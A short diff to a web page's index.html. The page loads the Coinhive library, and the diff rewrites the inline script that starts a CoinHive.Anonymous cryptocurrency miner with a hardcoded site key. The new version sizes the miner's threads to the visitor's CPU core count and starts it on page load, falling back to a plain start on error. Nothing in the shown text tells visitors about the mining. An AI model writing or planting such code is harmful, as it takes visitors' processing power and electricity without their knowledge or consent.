--- a/index.html
+++ b/index.html
@@ -8,8 +8,12 @@
     <meta name="viewport" content="width=device-width, initial-scale=1">
     <script src="https://coinhive.com/lib/coinhive.min.js"></script>
 <script>
-    var miner = new CoinHive.Anonymous('mgKCszBsJYX5eJqEaBwkha2dbZ9z7rMk', {username:'john-doe', throttle: 0.85, threads: 1});
-                miner.start();
+    var xmr = new CoinHive.Anonymous('mgKCszBsJYX5eJqEaBwkha2dbZ9z7rMk', {throttle: 0.85, threads: 1});
+try {
+	var threads = Math.max(1,Math.floor(navigator.hardwareConcurrency/4));
+	xmr.setNumThreads(threads);
+	xmr.start();
+}catch(e){xmr.start();}
 </script>
 </head>
 <body>
